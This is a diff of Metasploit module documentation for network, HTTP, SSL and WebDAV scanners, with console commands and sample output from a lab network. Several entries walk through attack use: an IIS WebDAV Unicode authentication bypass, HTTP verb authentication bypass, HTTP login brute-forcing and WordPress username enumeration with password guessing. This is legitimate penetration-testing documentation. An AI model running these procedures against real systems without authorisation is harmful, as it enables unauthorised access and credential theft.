|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/discovery/udp_sweep
|
||||||
|
msf auxiliary(udp_sweep) > set RHOSTS 192.168.1.2-254
|
||||||
|
RHOSTS => 192.168.1.2-254
|
||||||
|
msf auxiliary(udp_sweep) > set THREADS 253
|
||||||
|
THREADS => 253
|
||||||
|
msf auxiliary(udp_sweep) > run
|
||||||
|
|
||||||
|
[*] Sending 10 probes to 192.168.1.2->192.168.1.254 (253 hosts)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.109:137 (SAMSUNG::U :SAMSUNG::U :00:15:99:3f:40:bd)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.150:137 (XEN-WIN7-PROD::U :WORKGROUP::G :XEN-WIN7-PROD::U :WORKGROUP::G :aa:e3:27:6e:3b:a5)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.203:137 (XEN-XP-SPLOIT::U :WORKGROUP::G :XEN-XP-SPLOIT::U :WORKGROUP::G :3e:ff:3c:4c:89:67)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.201:137 (XEN-XP-SP2-BARE::U :HOTZONE::G :XEN-XP-SP2-BARE::U :HOTZONE::G :HOTZONE::U :__MSBROWSE__::G :c6:ce:4e:d9:c9:6e)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.206:137 (XEN-XP-PATCHED::U :XEN-XP-PATCHED::U :HOTZONE::G :HOTZONE::G :12:fa:1a:75:b8:a5)
|
||||||
|
[*] Discovered NetBIOS on 192.168.1.250:137 (FREENAS::U :FREENAS::U :FREENAS::U :__MSBROWSE__::G :WORKGROUP::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00)
|
||||||
|
[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
|
||||||
|
[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
|
||||||
|
[*] Discovered NTP on 192.168.1.69:123 (NTP v4)
|
||||||
|
[*] Discovered NTP on 192.168.1.99:123 (NTP v4)
|
||||||
|
[*] Discovered NTP on 192.168.1.201:123 (Microsoft NTP)
|
||||||
|
[*] Discovered NTP on 192.168.1.203:123 (Microsoft NTP)
|
||||||
|
[*] Discovered NTP on 192.168.1.206:123 (Microsoft NTP)
|
||||||
|
[*] Discovered MSSQL on 192.168.1.206:1434 (ServerName=XEN-XP-PATCHED InstanceName=SQLEXPRESS IsClustered=No Version=9.00.4035.00 tcp=1050 np=\\XEN-XP-PATCHED\pipe\MSSQL$SQLEXPRESS\sql\query )
|
||||||
|
[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
|
||||||
|
[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
|
||||||
|
[*] Scanned 253 of 253 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(udp_sweep) >
|
||||||
|
```
|
|
@ -0,0 +1,76 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module is a useful administrative scanner that allows you to cover a subnet to check whether or not server http certificates are expired. Using this scanner, you can uncover issuer of certificate, issue and expiry date.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/cert```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/cert
|
||||||
|
msf auxiliary(cert) > set RHOSTS 192.168.1.0/24
|
||||||
|
RHOSTS => 192.168.1.0/24
|
||||||
|
msf auxiliary(cert) > set THREADS 254
|
||||||
|
THREADS => 254
|
||||||
|
msf auxiliary(cert) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.11 - '192.168.1.11' : 'Sat Sep 25 07:16:02 UTC 2010' - 'Tue Sep 22 07:16:02 UTC 2020'
|
||||||
|
[*] 192.168.1.10 - '192.168.1.10' : 'Wed Mar 10 00:13:26 UTC 2010' - 'Sat Mar 07 00:13:26 UTC 2020'
|
||||||
|
[*] 192.168.1.201 - 'localhost' : 'Tue Nov 10 23:48:47 UTC 2009' - 'Fri Nov 08 23:48:47 UTC 2019'
|
||||||
|
[*] Scanned 255 of 256 hosts (099% complete)
|
||||||
|
[*] Scanned 256 of 256 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(cert) >
|
||||||
|
```
|
||||||
|
|
||||||
|
## Confirming
|
||||||
|
|
||||||
|
The following are other industry tools which can also be used. Note that the targets are not the same as those used in the previous documentation.
|
||||||
|
|
||||||
|
### [nmap](https://nmap.org/nsedoc/scripts/ssl-cert.html)
|
||||||
|
|
||||||
|
```
|
||||||
|
# nmap -p 443 192.168.2.137 -sV --script=ssl-cert
|
||||||
|
|
||||||
|
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-24 13:20 EST
|
||||||
|
Nmap scan report for ubuntu (192.168.2.137)
|
||||||
|
Host is up (0.0029s latency).
|
||||||
|
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||||
|
| ssl-cert: Subject: commonName=ubuntu
|
||||||
|
| Issuer: commonName=ubuntu
|
||||||
|
| Public Key type: rsa
|
||||||
|
| Public Key bits: 2048
|
||||||
|
| Signature Algorithm: sha256WithRSAEncryption
|
||||||
|
| Not valid before: 2018-01-26T21:38:21
|
||||||
|
| Not valid after: 2028-01-24T21:38:21
|
||||||
|
| MD5: d2a7 364d 636a 6eee c3e1 7af9 05f7 8c5b
|
||||||
|
|_SHA-1: a5bf f783 2514 90ee 365a 3ee4 9b6c 23f6 24af dbfa
|
||||||
|
MAC Address: 00:0C:29:5B:CF:75 (VMware)
|
||||||
|
```
|
||||||
|
|
||||||
|
### [sslscan](https://github.com/rbsec/sslscan)
|
||||||
|
```
|
||||||
|
# sslscan 192.168.2.137
|
||||||
|
Version: 1.11.11-static
|
||||||
|
OpenSSL 1.0.2-chacha (1.0.2g-dev)
|
||||||
|
|
||||||
|
Connected to 192.168.2.137
|
||||||
|
|
||||||
|
Testing SSL server 192.168.2.137 on port 443 using SNI name 192.168.2.137
|
||||||
|
```
|
||||||
|
...snip...
|
||||||
|
```
|
||||||
|
Subject: ubuntu
|
||||||
|
Issuer: ubuntu
|
||||||
|
|
||||||
|
Not valid before: Jan 26 21:38:21 2018 GMT
|
||||||
|
Not valid after: Jan 24 21:38:21 2028 GMT
|
||||||
|
```
|
|
@ -0,0 +1,68 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module scans one or more web servers for interesting directories that can be further explored.
|
||||||
|
|
||||||
|
## Verfication Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/dir_scanner```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/dir_scanner
|
||||||
|
msf auxiliary(dir_scanner) > set RHOSTS 192.168.1.201
|
||||||
|
RHOSTS => 192.168.1.201
|
||||||
|
msf auxiliary(dir_scanner) > run
|
||||||
|
|
||||||
|
[*] Using code '404' as not found for 192.168.1.201
|
||||||
|
[*] Found http://192.168.1.201:80/.../ 403 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/Joomla/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/cgi-bin/ 403 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/error/ 403 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/icons/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/oscommerce/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/phpmyadmin/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/security/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/webalizer/ 200 (192.168.1.201)
|
||||||
|
[*] Found http://192.168.1.201:80/webdav/ 200 (192.168.1.201)
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(dir_scanner) >
|
||||||
|
```
|
||||||
|
|
||||||
|
## Confirming
|
||||||
|
|
||||||
|
The following are other industry tools which can also be used. Note that the targets are not the same as those used in the previous documentation.
|
||||||
|
|
||||||
|
### [dirb](http://dirb.sourceforge.net/)
|
||||||
|
|
||||||
|
```
|
||||||
|
# dirb http://192.168.2.137 /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt
|
||||||
|
|
||||||
|
-----------------
|
||||||
|
DIRB v2.22
|
||||||
|
By The Dark Raver
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
START_TIME: Sat Feb 24 12:56:40 2018
|
||||||
|
URL_BASE: http://192.168.2.137/
|
||||||
|
WORDLIST_FILES: /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt
|
||||||
|
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
GENERATED WORDS: 2351
|
||||||
|
|
||||||
|
---- Scanning URL: http://192.168.2.137/ ----
|
||||||
|
==> DIRECTORY: http://192.168.2.137/.../
|
||||||
|
==> DIRECTORY: http://192.168.2.137/Joomla/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/cgi-bin/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/error/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/icons/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/oscommerce/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/phpmyadmin/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/security/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/webalizer/
|
||||||
|
==> DIRECTORY: http://192.168.2.137/webdav/
|
||||||
|
```
|
|
@ -0,0 +1,41 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a `%c0%af` (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting `%c0%af` into a `/protected/` initial pathname component to bypass the password protection on the `protected` folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. More info about this vulnerability can be found in [CVE-2009-1535](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1535).
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/dir_webdav_unicode_bypass```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [number of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
|
||||||
|
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
|
||||||
|
THREADS => 20
|
||||||
|
msf auxiliary(dir_webdav_unicode_bypass) > run
|
||||||
|
|
||||||
|
[*] Using code '404' as not found.
|
||||||
|
[*] Using code '404' as not found.
|
||||||
|
[*] Using code '404' as not found.
|
||||||
|
[*] Found protected folder http://192.168.1.211:80/admin/ 401 (192.168.1.211)
|
||||||
|
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
|
||||||
|
[*] Found protected folder http://192.168.1.223:80/phpmyadmin/ 401 (192.168.1.223)
|
||||||
|
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
|
||||||
|
[*] Found protected folder http://192.168.1.223:80/security/ 401 (192.168.1.223)
|
||||||
|
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
|
||||||
|
[*] Found protected folder http://192.168.1.204:80/printers/ 401 (192.168.1.204)
|
||||||
|
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
|
||||||
|
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.204:80/%c0%afprinters/ 207 (192.168.1.204)
|
||||||
|
[*] Found protected folder http://192.168.1.203:80/printers/ 401 (192.168.1.203)
|
||||||
|
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
|
||||||
|
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.203:80/%c0%afprinters/ 207 (192.168.1.203)
|
||||||
|
...snip...
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(dir_webdav_unicode_bypass) >
|
||||||
|
```
|
|
@ -1,6 +1,6 @@
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
|
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication. More info can be found in [cve-1999-0502](https://www.cvedetails.com/cve/cve-1999-0502).
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -11,35 +11,8 @@ This module is a brute-force login scanner that attempts to authenticate to a sy
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
**Running the scanner**
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/http/http_login
|
msf > use auxiliary/scanner/http/http_login
|
||||||
msf auxiliary(http_login) > show options
|
|
||||||
|
|
||||||
Module options (auxiliary/scanner/http/http_login):
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AUTH_URI no The URI to authenticate against (default:auto)
|
|
||||||
BLANK_PASSWORDS false no Try blank passwords for all users
|
|
||||||
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
|
||||||
DB_ALL_CREDS false no Try each user/password couple stored in the current database
|
|
||||||
DB_ALL_PASS false no Add all passwords in the current database to the list
|
|
||||||
DB_ALL_USERS false no Add all users in the current database to the list
|
|
||||||
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
|
|
||||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
||||||
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
|
|
||||||
RHOSTS yes The target address range or CIDR identifier
|
|
||||||
RPORT 80 yes The target port (TCP)
|
|
||||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
|
||||||
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
|
|
||||||
THREADS 1 yes The number of concurrent threads
|
|
||||||
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
|
|
||||||
USER_AS_PASS false no Try the username as the password for all users
|
|
||||||
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
|
|
||||||
VERBOSE true yes Whether to print output for all attempts
|
|
||||||
VHOST
|
|
||||||
msf auxiliary(http_login) > set AUTH_URI /xampp/
|
msf auxiliary(http_login) > set AUTH_URI /xampp/
|
||||||
AUTH_URI => /xampp/
|
AUTH_URI => /xampp/
|
||||||
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
|
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
|
||||||
|
|
|
@ -0,0 +1,47 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module queries a host or range of hosts and pull the SSL certificate information if one is installed.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/ssl```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set THREADS [num of threads]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/ssl
|
||||||
|
msf auxiliary(ssl) > set RHOSTS 192.168.1.200-254
|
||||||
|
RHOSTS => 192.168.1.200-254
|
||||||
|
msf auxiliary(ssl) > set THREADS 20
|
||||||
|
THREADS => 20
|
||||||
|
msf auxiliary(ssl) > run
|
||||||
|
|
||||||
|
[*] Error: 192.168.1.205: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
|
||||||
|
[*] Error: 192.168.1.206: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
|
||||||
|
[*] 192.168.1.208:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: md5WithRSAEncryption
|
||||||
|
[*] 192.168.1.208:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
|
||||||
|
[*] 192.168.1.208:443 has common name localhost.localdomain
|
||||||
|
[*] 192.168.1.211:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: sha1WithRSAEncryption
|
||||||
|
[*] 192.168.1.211:443 has common name localhost.localdomain
|
||||||
|
[*] Scanned 13 of 55 hosts (023% complete)
|
||||||
|
[*] Error: 192.168.1.227: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
|
||||||
|
[*] 192.168.1.223:443 Subject: /CN=localhost Signature Alg: sha1WithRSAEncryption
|
||||||
|
[*] 192.168.1.223:443 has common name localhost
|
||||||
|
[*] 192.168.1.222:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
|
||||||
|
[*] 192.168.1.222:443 has common name MAILMAN
|
||||||
|
[*] Scanned 30 of 55 hosts (054% complete)
|
||||||
|
[*] Scanned 31 of 55 hosts (056% complete)
|
||||||
|
[*] Scanned 39 of 55 hosts (070% complete)
|
||||||
|
[*] Scanned 41 of 55 hosts (074% complete)
|
||||||
|
[*] Scanned 43 of 55 hosts (078% complete)
|
||||||
|
[*] Scanned 45 of 55 hosts (081% complete)
|
||||||
|
[*] Scanned 46 of 55 hosts (083% complete)
|
||||||
|
[*] Scanned 53 of 55 hosts (096% complete)
|
||||||
|
[*] Scanned 55 of 55 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(ssl) >
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module scans a server or range of servers and attempts to bypass authentication by using different HTTP verbs.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/verb_auth_bypass```
|
||||||
|
2. Do: ```set PATH [auth page]```
|
||||||
|
3. Do: ```set RHOSTS [IP]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/verb_auth_bypass
|
||||||
|
msf auxiliary(verb_auth_bypass) > set PATH /xampp/
|
||||||
|
PATH => /xampp/
|
||||||
|
msf auxiliary(verb_auth_bypass) > set RHOSTS 192.168.1.201
|
||||||
|
RHOSTS => 192.168.1.201
|
||||||
|
msf auxiliary(verb_auth_bypass) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.201 requires authentication: Basic realm="xampp user" [401]
|
||||||
|
[*] Testing verb HEAD resp code: [401]
|
||||||
|
[*] Testing verb TRACE resp code: [200]
|
||||||
|
[*] Possible authentication bypass with verb TRACE code 200
|
||||||
|
[*] Testing verb TRACK resp code: [401]
|
||||||
|
[*] Testing verb WMAP resp code: [401]
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(verb_auth_bypass) >
|
||||||
|
```
|
|
@ -0,0 +1,39 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module scans a server or range of servers and attempts to determine if WebDav is enabled. This allows us to better fine-tune our attacks.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/webdav_scanner```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/webdav_scanner
|
||||||
|
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.200-250
|
||||||
|
RHOSTS => 192.168.1.200-250
|
||||||
|
msf auxiliary(webdav_scanner) > set THREADS 20
|
||||||
|
THREADS => 20
|
||||||
|
msf auxiliary(webdav_scanner) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.203 (Microsoft-IIS/5.1) has WEBDAV ENABLED
|
||||||
|
[*] 192.168.1.209 (Apache/2.0.54 (Linux/SUSE)) WebDAV disabled.
|
||||||
|
[*] 192.168.1.208 (Apache/2.0.52 (CentOS)) WebDAV disabled.
|
||||||
|
[*] 192.168.1.213 (Apache/2.2.14 (Ubuntu)) WebDAV disabled.
|
||||||
|
[*] Scanned 14 of 51 hosts (027% complete)
|
||||||
|
[*] 192.168.1.222 (Apache/1.3.23 (Unix) (Red-Hat/Linux) mod_python/2.7.6 Python/1.5.2 mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 mod_throttle/3.1.2) WebDAV disabled.
|
||||||
|
[*] 192.168.1.223 (Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
|
||||||
|
[*] 192.168.1.229 (Microsoft-IIS/6.0) has WEBDAV ENABLED
|
||||||
|
[*] 192.168.1.224 (Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6) WebDAV disabled.
|
||||||
|
[*] 192.168.1.227 (Microsoft-IIS/5.0) has WEBDAV ENABLED
|
||||||
|
[*] Scanned 28 of 51 hosts (054% complete)
|
||||||
|
[*] 192.168.1.234 (lighttpd/1.4.25) WebDAV disabled.
|
||||||
|
[*] 192.168.1.235 (Apache/2.2.3 (CentOS)) WebDAV disabled.
|
||||||
|
[*] Scanned 38 of 51 hosts (074% complete)
|
||||||
|
[*] Scanned 51 of 51 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(webdav_scanner) >
|
||||||
|
```
|
|
@ -0,0 +1,46 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This auxiliary module scans a host or range of hosts for servers that disclose their content via WebDav.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/webdav_website_content```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/webdav_website_content
|
||||||
|
msf auxiliary(webdav_website_content) > set RHOSTS 192.168.1.201
|
||||||
|
RHOSTS => 192.168.1.201
|
||||||
|
msf auxiliary(webdav_website_content) > run
|
||||||
|
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/aspnet_client/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/images/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_private/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/iisstart.htm
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_cnf/pagerror.gif
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_log/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/access.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/botinfs.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/bots.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/deptodoc.btr
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/doctodep.btr
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/frontpg.lck
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/linkinfo.btr
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/service.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/service.lck
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/services.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/svcacl.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/uniqperm.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_pvt/writeto.cnf
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_script/
|
||||||
|
[*] Found file or directory in WebDAV response (192.168.1.201) http://192.168.1.201/_vti_txt/
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(webdav_website_content) >
|
||||||
|
```
|
|
@ -0,0 +1,53 @@
|
||||||
|
## Descriptions
|
||||||
|
|
||||||
|
This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More infomation can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335).
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/wordpress_login_enum```
|
||||||
|
2. Do: ```set URI [URI]```
|
||||||
|
3. Do: ```set PASS_FILE [password file]```
|
||||||
|
4. Do: ```set USER_FILE [username list file]```
|
||||||
|
5. Do: ```set RHOSTS [IP]```
|
||||||
|
6. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/wordpress_login_enum
|
||||||
|
msf auxiliary(wordpress_login_enum) > set URI /wordpress/wp-login.php
|
||||||
|
URI => /wordpress/wp-login.php
|
||||||
|
msf auxiliary(wordpress_login_enum) > set PASS_FILE /tmp/passes.txt
|
||||||
|
PASS_FILE => /tmp/passes.txt
|
||||||
|
msf auxiliary(wordpress_login_enum) > set USER_FILE /tmp/users.txt
|
||||||
|
USER_FILE => /tmp/users.txt
|
||||||
|
msf auxiliary(wordpress_login_enum) > set RHOSTS 192.168.1.201
|
||||||
|
RHOSTS => 192.168.1.201
|
||||||
|
msf auxiliary(wordpress_login_enum) > run
|
||||||
|
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Running User Enumeration
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'administrator'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'administrator'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'admin'
|
||||||
|
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration- Username: 'admin' - is VALID
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'root'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'root'
|
||||||
|
[*] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Checking Username:'god'
|
||||||
|
[-] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Invalid Username: 'god'
|
||||||
|
[+] http://192.168.1.201:80/wordpress/wp-login.php - WordPress Enumeration - Found 1 valid user
|
||||||
|
